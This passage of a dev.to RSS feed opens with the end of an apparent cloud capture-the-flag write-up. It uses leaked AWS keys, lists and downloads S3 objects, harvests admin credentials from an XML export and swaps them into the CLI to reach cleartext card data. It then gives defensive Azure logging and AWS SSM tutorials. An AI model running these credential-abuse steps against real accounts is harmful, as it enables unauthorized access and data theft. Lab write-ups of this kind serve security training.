&lt;li&gt;secret key: &lt;code&gt;MwGe3leVQS6SDWYqlpe9cQG5KmU0UFiG83RX/gb9&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Check our identity&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws sts get-caller-identity
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24plxauelbq0dbccpjxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24plxauelbq0dbccpjxi.png" alt="Image description" width="770" height="206"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This reveals an IAM user &lt;code&gt;pam-test&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;With these credentials, we are able to list the &lt;code&gt;admin&lt;/code&gt; directory, but we cannot download the flag. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqgzs2cktx0wsol77mdh4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqgzs2cktx0wsol77mdh4.png" alt="Image description" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;
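
&lt;p&gt;Roughly, the listing succeeds while the copy is denied (the flag's object key here is assumed for illustration):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 ls s3://dev.huge-logistics.com/admin/
# object key assumed; the copy is denied either way
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;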

&lt;p&gt;We are, however, able to reveal more files in the &lt;code&gt;migration-files&lt;/code&gt; directory. &lt;/p&gt;

&lt;p&gt;Download the XML file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat test-export.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We see even more privileged credentials!&lt;/p&gt;

&lt;p&gt;Take note of the &lt;code&gt;AWS IT Admin&lt;/code&gt; credentials. &lt;/p&gt;

&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CredentialsExport&amp;gt;
    &amp;lt;!-- Oracle Database Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Oracle Database&amp;lt;/ServiceType&amp;gt;
        &amp;lt;Hostname&amp;gt;oracle-db-server02.prod.hl-internal.com&amp;lt;/Hostname&amp;gt;
        &amp;lt;Username&amp;gt;admin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;Password123!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Primary Oracle database for the financial application. Ensure strong password policy.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- HP Server Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;HP Server Cluster&amp;lt;/ServiceType&amp;gt;
        &amp;lt;Hostname&amp;gt;hp-cluster1.prod.hl-internal.com&amp;lt;/Hostname&amp;gt;
        &amp;lt;Username&amp;gt;root&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;RootPassword456!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;HP server cluster for batch jobs. Periodically rotate this password.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- AWS Production Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;AWS IT Admin&amp;lt;/ServiceType&amp;gt;
        &amp;lt;AccountID&amp;gt;794929857501&amp;lt;/AccountID&amp;gt;
        &amp;lt;AccessKeyID&amp;gt;AKIA3SFMDAPOQRFWFGCD&amp;lt;/AccessKeyID&amp;gt;
        &amp;lt;SecretAccessKey&amp;gt;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&amp;lt;/SecretAccessKey&amp;gt;
        &amp;lt;Notes&amp;gt;AWS credentials for production workloads. Do not share these keys outside of the organization.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Iron Mountain Backup Portal --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Iron Mountain Backup&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://backupportal.ironmountain.com&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;hladmin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;HLPassword789!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Account used to schedule tape collections and deliveries. Schedule regular password rotations.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Office 365 Admin Account --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Office 365&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://admin.microsoft.com&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;admin@company.onmicrosoft.com&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;O365Password321!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Office 365 global admin account. Use for essential administrative tasks only and enable MFA.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Jira Admin Account --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Jira&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://hugelogistics.atlassian.net&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;jira_admin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;JiraPassword654!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Jira administrative account. Restrict access and consider using API tokens where possible.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
&amp;lt;/CredentialsExport&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;AWS IT Admin&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Access Key: &lt;code&gt;AKIA3SFMDAPOQRFWFGCD&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Secret Key: &lt;code&gt;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&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
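
&lt;p&gt;We can swap these into our CLI profile without re-running the interactive prompt, for example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure set aws_access_key_id AKIA3SFMDAPOQRFWFGCD
aws configure set aws_secret_access_key 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
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;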

&lt;p&gt;We can now see an export of user credit card information in cleartext!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiimk9q5z2r5xsicz3sep.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiimk9q5z2r5xsicz3sep.png" alt="Image description" width="800" height="590"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Creating a Data Collection Rule to populate "Event" logs in Azure</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Wed, 11 Sep 2024 01:48:27 +0000</pubDate>
      <link>https://dev.to/aktran321/troubleshooting-ms-sql-brute-force-attempts-4djc</link>
      <guid>https://dev.to/aktran321/troubleshooting-ms-sql-brute-force-attempts-4djc</guid>
      <description>&lt;p&gt;Multiple people have been running into the issue of the Event table in Azure not showing up in their Logs Analytics Workspace, they haven't been able to produce the heat map to visualize where attacks into their MS SQL server are coming from. &lt;/p&gt;

&lt;p&gt;To get the "Event" table to properly query, we can create a new Data Collection Rule.&lt;/p&gt;

&lt;p&gt;To do this, &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;navigate to your Log Analytics Workspace -&amp;gt; Agents &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;click "Data Collection Rules"&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fncosr8gbozxj5n0pm5gx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fncosr8gbozxj5n0pm5gx.png" alt="Data Collection Rules View Button" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This will take you to a window showing all your Data Collection Rules. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click the "Create" button on the top left to create a new rule.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5g2q3ydr4bqzoo3ox5u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5g2q3ydr4bqzoo3ox5u.png" alt="Create Data Collection Rule Button" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Next, create a name and specify your subscription, resource group, and region. Platform Type should be "All".&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fem13zt3xuo6m79qs8tuh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fem13zt3xuo6m79qs8tuh.png" alt="Basic Config" width="800" height="584"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to "&amp;lt; Next : Resource &amp;gt;"&lt;/li&gt;
&lt;li&gt;Hit "Add Resources" on the top left&lt;/li&gt;
&lt;li&gt;Select both our linux and windows virtual machines&lt;/li&gt;
&lt;li&gt;hit "Apply"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp1td539o0liyfn5ik7mc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp1td539o0liyfn5ik7mc.png" alt="Resources" width="800" height="297"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(Hopefully you're using Ubuntu 22.04, as 24.04 has been causing problems with data collection agents recently, as of September 10th, 2024.)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;In the "Collect and deliver" window, we hit "Add data resource"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Data Source Type: "Linux Syslog"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;set "LOG_AUTH" to "LOG_DEBUG"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You should also manually set all other facility options to "None"&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiog4pt6pttt8y4pn52wz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiog4pt6pttt8y4pn52wz.png" alt="Collect and Deliver Config" width="800" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Now in the same window, we hit "Destination" and set it to our Log Analytics Workspace.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3zj5n22nz6f0uvoxd57.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3zj5n22nz6f0uvoxd57.png" alt="Destination" width="800" height="478"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Add the data source.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, we create another data source for our Windows VM.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Data Source Type: Windows Event Logs&lt;/li&gt;
&lt;li&gt;Choose "Basic" for log collection configuration settings
Check the following boxes:&lt;/li&gt;
&lt;li&gt;Information&lt;/li&gt;
&lt;li&gt;Audit Success&lt;/li&gt;
&lt;li&gt;Audit Failure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgcdvdpll2c4mtxozupcg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgcdvdpll2c4mtxozupcg.png" alt="Windows VM Data Resource" width="800" height="781"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the custom tab, we want to add two XPath queries:&lt;/p&gt;

&lt;p&gt;Windows Defender Malware Detection XPath Query&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Microsoft-Windows-Windows Defender/Operational!*[System[(EventID=1116 or EventID=1117)]]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Windows Firewall Tampering Detection XPath Query&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Microsoft-Windows-Windows Firewall With Advanced Security/Firewall!*[System[(EventID=2003)]]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These will forward logs when malware is detected or when the firewall is tampered with.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6twxn1cjmimlf160ibpv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6twxn1cjmimlf160ibpv.png" alt="xpath queries" width="800" height="638"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click next and configure the destination like we did before&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faz8g3vwqotyl9f50iozl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faz8g3vwqotyl9f50iozl.png" alt="windows vm destination config" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At this point, you are good to create your Data Collection Rule.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qr1navn0u7zuhp1cxq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qr1navn0u7zuhp1cxq2.png" alt="Final Review" width="800" height="1006"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw51ir5b5kcz2anny17.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw51ir5b5kcz2anny17.png" alt="Creation of DCR" width="800" height="391"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, when "Event" is queried, it shows up in our Log Analytics Workspace&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb0xk24llfypn89notmi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb0xk24llfypn89notmi.png" alt="Event Query" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;
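
&lt;p&gt;As a quick sanity check, a KQL query along these lines should return the failed-logon events the heat map is built from (this assumes MS SQL failed logins land in the Application log as EventID 18456):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// EventID 18456 assumed: MS SQL "login failed" audit event
Event
| where EventLog == "Application"
| where EventID == 18456
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;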

</description>
    </item>
    <item>
      <title>How to Connect to an EC2 Instance with SSM</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 30 Aug 2024 21:41:18 +0000</pubDate>
      <link>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-with-ssm-598h</link>
      <guid>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-with-ssm-598h</guid>
      <description>&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Launch an EC2 instance. (Preferably with an AMI using Amazon Linux 2023 or later)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create an IAM role, and attach the policy "AmazonSSMManagedInstanceCore"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Attach the role to your EC2 instance&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Go to your instance, click "connect" and choose "Session Manager"&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
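
&lt;p&gt;For those who prefer the CLI, steps 2 and 3 could look roughly like this; the role and profile names are placeholders, and the trust policy file is assumed to allow ec2.amazonaws.com to assume the role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Placeholder names; create the role and attach the SSM managed policy
aws iam create-role --role-name ssm-ec2-role \
  --assume-role-policy-document file://ec2-trust.json
aws iam attach-role-policy --role-name ssm-ec2-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore

# EC2 attaches roles via an instance profile
aws iam create-instance-profile --instance-profile-name ssm-ec2-profile
aws iam add-role-to-instance-profile --instance-profile-name ssm-ec2-profile \
  --role-name ssm-ec2-role
aws ec2 associate-iam-instance-profile --instance-id i-0123456789abcdef0 \
  --iam-instance-profile Name=ssm-ec2-profile
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;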

&lt;p&gt;The benefit of connecting to your EC2 instance through Session Manager is that it doesn't require you to open any inbound ports. This reduces the attack surface of your systems, providing more security for your network. &lt;/p&gt;

&lt;p&gt;Tip: After you create your EC2 instance, you can check whether it has the SSM Agent installed by connecting with EC2 Instance Connect first and then running the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl status amazon-ssm-agent
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should get output like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkhakqkxwvdbdl8ua9ls4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkhakqkxwvdbdl8ua9ls4.png" alt="Direct Connect Output" width="800" height="190"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>How to Connect to an EC2 Instance in a Private Subnet</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Sun, 14 Jul 2024 05:15:16 +0000</pubDate>
      <link>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-in-a-private-subnet-13cm</link>
      <guid>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-in-a-private-subnet-13cm</guid>
      <description>&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;p&gt;Before you start, ensure you have the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An EC2 instance running in a private subnet.&lt;/li&gt;
&lt;li&gt;AWS Systems Manager (SSM) Agent installed and running on the instance.&lt;/li&gt;
&lt;li&gt;An IAM role attached to the instance with the necessary permissions to use SSM.&lt;/li&gt;
&lt;li&gt;AWS CLI configured on your local machine, with the Session Manager plugin installed.&lt;/li&gt;
&lt;/ul&gt;
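
&lt;p&gt;One thing worth noting: since the instance has no internet route of its own, the SSM Agent also needs a path to the Systems Manager endpoints, either through a NAT gateway or through VPC interface endpoints. A rough sketch of the endpoint approach (all IDs are placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Placeholder IDs; interface endpoints SSM needs in the instance's VPC
for svc in ssm ec2messages ssmmessages; do
  aws ec2 create-vpc-endpoint \
    --vpc-id vpc-0123456789abcdef0 \
    --vpc-endpoint-type Interface \
    --service-name com.amazonaws.us-east-1.$svc \
    --subnet-ids subnet-0123456789abcdef0 \
    --security-group-ids sg-0123456789abcdef0
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;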

&lt;h2&gt;
  
  
  Step 1: Attach an IAM Role to the EC2 Instance
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Create an IAM Role&lt;/strong&gt; (if you don’t have one):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to the &lt;strong&gt;IAM&lt;/strong&gt; service in the AWS Management Console.&lt;/li&gt;
&lt;li&gt;Choose &lt;strong&gt;Roles&lt;/strong&gt; and then &lt;strong&gt;Create role&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Select &lt;strong&gt;AWS service&lt;/strong&gt; and choose &lt;strong&gt;EC2&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attach the &lt;strong&gt;AmazonSSMManagedInstanceCore&lt;/strong&gt; managed policy (the older &lt;strong&gt;AmazonEC2RoleforSSM&lt;/strong&gt; policy is deprecated).&lt;/li&gt;
&lt;li&gt;Name your role and complete the creation process.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Attach the IAM Role to your EC2 Instance&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to the &lt;strong&gt;EC2 Dashboard&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Select your instance.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Actions&lt;/strong&gt; &amp;gt; &lt;strong&gt;Security&lt;/strong&gt; &amp;gt; &lt;strong&gt;Modify IAM Role&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attach the IAM role you created or an existing role with the necessary SSM permissions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Step 2: Verify SSM Agent Installation
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Check if SSM Agent is Installed&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Connect to your instance using an existing method (if possible) or check the instance launch configuration.&lt;/li&gt;
&lt;li&gt;For Amazon Linux, the SSM Agent is pre-installed. For other AMIs, you might need to install it manually.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Install SSM Agent Manually&lt;/strong&gt; (if not installed):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;For Amazon Linux:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;yum &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; amazon-ssm-agent
 &lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl start amazon-ssm-agent
 &lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl &lt;span class="nb"&gt;enable &lt;/span&gt;amazon-ssm-agent
&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Step 3: Connect to the Instance Using SSM
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configure AWS CLI&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Open your terminal or command prompt.&lt;/li&gt;
&lt;li&gt;Configure the AWS CLI with your credentials and default region:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; aws configure
